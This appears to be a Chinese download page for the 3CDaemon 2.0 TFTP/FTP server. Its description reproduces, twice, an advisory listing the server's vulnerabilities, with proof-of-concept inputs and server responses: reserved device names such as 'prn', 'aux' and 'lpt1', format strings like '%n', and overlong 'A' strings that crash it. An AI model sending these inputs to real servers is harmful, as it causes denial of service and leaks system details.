您现在的位置是:网站首页> 软件下载软件下载
3COM 3CDaemon下载2.0 汉化免安装版-集成了TFTP、FTP和SYSLOG功能的应用程序软件下载
2021-05-20
122人已围观
简介 3COM 3CDaemon下载2.0 汉化免安装版-集成了TFTP、FTP和SYSLOG功能的应用程序软件下载
不用我说了吧,3com的这款东西还是很有名很不错滴~~~3CDaemon是一款免费的集成了TFTP、FTP和SYSLOG功能的应用程序。
作用:FTP,TFTP,SYSLOG服务器,TFTP客户端
3CDaemon存在多个安全问题,远程攻击者可以利用这些漏洞进行拒绝服务、格式串及缓冲区溢出等攻击。
1、TFTP保留设备名拒绝服务攻击:
提交类似如下的请求,可导致TFTP服务程序挂起:
D:\WINDOWS\system32>tftp -i 192.168.0.1 get prn
The 3CDaemon will be crashed with some msgs like
"Microsoft Visual C++ Runtime library"
"Runtime Error!"
"Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "
"abnormal program termination".
2、FTP用户名存在格式串问题:
提交包含格式串字符作为用户名数据,可导致守护程序崩溃:
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %n
Connection closed by remote host.
OR:
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %s
331 User name ok, need password
Password:[anythinghere]
530 Login access denied
Login failed.
ftp>
3、FTP超长用户名缓冲区溢出
由于对用户名缺少正确边界缓冲区检查,提交超长用户名可导致缓冲区溢出:
D:\WINDOWS\system32>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)):
501 Invalid or missing parameters
Login failed.
ftp> user AAA..[about 241 A here]...AAAAA
Connection closed by remote host.
4、多个FTP命令超长参数缓冲区溢出:
cd,send,ls,,put,delete,rename,rmdir,literal,stat,CWD等FTP命令对参数缺少充分边界检查,提交超长字符串作为命令参数可导致缓冲区溢出:
ftp> cd AAA..[about 398 A here]...AAAAA
Connection closed by remote host.
ftp>
ftp> ls AAA..[about 247 A here]...AAAAA
200 PORT command successful.
Connection closed by remote host.
ftp> put 1.txt AAA..[about 247 A here]...AAAAA
200 PORT command successful.
532 Need account for storing files
Connection closed by remote host.
5、多个FTP命令存在格式串问题
提交格式字符串作为参数,可导致程序崩溃。
6、多个FTP命令包设备名信息泄露问题
请求保留设备名可导致返回程序安装路径信息:
ftp> cd aux
550 aux : C:/3cdaemon/aux is not a directory!
ftp> cd lpt1
550 lpt1 : C:/3cdaemon/lpt1 is not a directory!
受影响系统:
3Com 3CDaemon 2.0 revision 10
作用:FTP,TFTP,SYSLOG服务器,TFTP客户端
3CDaemon存在多个安全问题,远程攻击者可以利用这些漏洞进行拒绝服务、格式串及缓冲区溢出等攻击。
1、TFTP保留设备名拒绝服务攻击:
提交类似如下的请求,可导致TFTP服务程序挂起:
D:\WINDOWS\system32>tftp -i 192.168.0.1 get prn
The 3CDaemon will be crashed with some msgs like
"Microsoft Visual C++ Runtime library"
"Runtime Error!"
"Program : C:\Program Files\3Com\3CDaemon\3CDaemon.exe "
"abnormal program termination".
2、FTP用户名存在格式串问题:
提交包含格式串字符作为用户名数据,可导致守护程序崩溃:
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %n
Connection closed by remote host.
OR:
H:\>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)): %s
331 User name ok, need password
Password:[anythinghere]
530 Login access denied
Login failed.
ftp>
3、FTP超长用户名缓冲区溢出
由于对用户名缺少正确边界缓冲区检查,提交超长用户名可导致缓冲区溢出:
D:\WINDOWS\system32>ftp 192.168.0.1
Connected to 192.168.0.1.
220 3Com 3CDaemon FTP Server Version 2.0
User (192.168.0.1:(none)):
501 Invalid or missing parameters
Login failed.
ftp> user AAA..[about 241 A here]...AAAAA
Connection closed by remote host.
4、多个FTP命令超长参数缓冲区溢出:
cd,send,ls,,put,delete,rename,rmdir,literal,stat,CWD等FTP命令对参数缺少充分边界检查,提交超长字符串作为命令参数可导致缓冲区溢出:
ftp> cd AAA..[about 398 A here]...AAAAA
Connection closed by remote host.
ftp>
ftp> ls AAA..[about 247 A here]...AAAAA
200 PORT command successful.
Connection closed by remote host.
ftp> put 1.txt AAA..[about 247 A here]...AAAAA
200 PORT command successful.
532 Need account for storing files
Connection closed by remote host.
5、多个FTP命令存在格式串问题
提交格式字符串作为参数,可导致程序崩溃。
6、多个FTP命令包设备名信息泄露问题
请求保留设备名可导致返回程序安装路径信息:
ftp> cd aux
550 aux : C:/3cdaemon/aux is not a directory!
ftp> cd lpt1
550 lpt1 : C:/3cdaemon/lpt1 is not a directory!
受影响系统:
3Com 3CDaemon 2.0 revision 10
虚拟光驱(Daemon Tools Lite)v10.13.0.1312 中文安装版
DAEMON Tools Litev10.4 绿色中文版
Daemon Sync服务器端v1.0.1.0001 官方最新版
Daemon Tools(虚拟光驱)4.4.03 简体中文特别版
虚拟硬盘镜像(DAEMON Tools Ultra)v5.5.0.1046 特别版
DAEMON Tools Lite虚拟光驱32位64位版v10.6.0.283中文版免激活码带教程
DAEMON Sync苹果版v2.0 官方最新版相关内容
- IP地址显示工具My IP Address下载1.0 绿色版-显示自己电脑上的internetIP地址软件下载
- 网络优化软件TCP Optimizer下载3.0.4 绿色版-网络加速软件软件下载
- 360doc个人图书馆快捷访问工具下载-直接访问360doc个人图书馆网站首页软件下载
- Google谷歌音乐批量下载工具下载V0.2.4 免费绿色版-谷歌音乐下载软件下载
- 创建能启动电脑的u盘工具下载v2.6 英文绿色版-LiLiUSBCreator软件下载
- 星空迅雷工具下载1.7 绿色免费版-最新版迅雷去广告补丁软件下载
- File Transporter Free(迷你FTP工具)下载v1.55英文绿色版-迷你FTP工具软件下载
- FTP服务器(BulletProof FTP Server)下载v2010.1.0.43 破解版-原名G6FTPServer软件下载
- 动态网站主页转静态工具下载1.0 免费简体绿色版-可提高浏览速度和网站安全软件下载
- 恶意网站拦截屏蔽文件补丁下载V2010 9. 24 绿色免费版-恶意网站拦截屏蔽文件补丁软件下载
点击排行
- 批量提取视频中的音频 MediaHuman Audio Converter v1.7.5 英文官方免费版 下载-
- 免费音频编辑软件下载 免费音频编辑软件 ocenaudio v3.11.22 官方安装版 32位 下载-
- 搜索宝鸟语花香收音机 v1.9 网络收音机 中文绿色免费版 下载-
- 奇信录音转文字APP下载 奇信录音转文字 for Android V2.0.5 安卓手机版 下载-
- 袅袅歌声合成软件 v1.9.38 国内首款歌声合成软件 中文绿色免费版 下载-
- MIDI-TO-MP3 v1.2 midi转mp3工具 汉化绿色版 下载-
- Win8音乐播放器 metro音乐播放器 myplayer v1.3 英文官方安装版 下载-
- Easy CD-DA Extractor 2011 v16.0.9 多语中文特别版 音乐CD抓取、格式转换、光盘刻录软件 下载-
本栏推荐
-
批量提取视频中的音频 MediaHuman Audio Converter v1.7.5 英文官方免费版 下载-
-
免费音频编辑软件下载 免费音频编辑软件 ocenaudio v3.11.22 官方安装版 32位 下载-
-
搜索宝鸟语花香收音机 v1.9 网络收音机 中文绿色免费版 下载-
-
奇信录音转文字APP下载 奇信录音转文字 for Android V2.0.5 安卓手机版 下载-
-
袅袅歌声合成软件 v1.9.38 国内首款歌声合成软件 中文绿色免费版 下载-
-
MIDI-TO-MP3 v1.2 midi转mp3工具 汉化绿色版 下载-
-
Win8音乐播放器 metro音乐播放器 myplayer v1.3 英文官方安装版 下载-
猜你喜欢
- 批量提取视频中的音频 MediaHuman Audio Converter v1.7.5 英文官方免费版 下载-
- 免费音频编辑软件下载 免费音频编辑软件 ocenaudio v3.11.22 官方安装版 32位 下载-
- 搜索宝鸟语花香收音机 v1.9 网络收音机 中文绿色免费版 下载-
- 奇信录音转文字APP下载 奇信录音转文字 for Android V2.0.5 安卓手机版 下载-
- 袅袅歌声合成软件 v1.9.38 国内首款歌声合成软件 中文绿色免费版 下载-
- MIDI-TO-MP3 v1.2 midi转mp3工具 汉化绿色版 下载-
- Win8音乐播放器 metro音乐播放器 myplayer v1.3 英文官方安装版 下载-
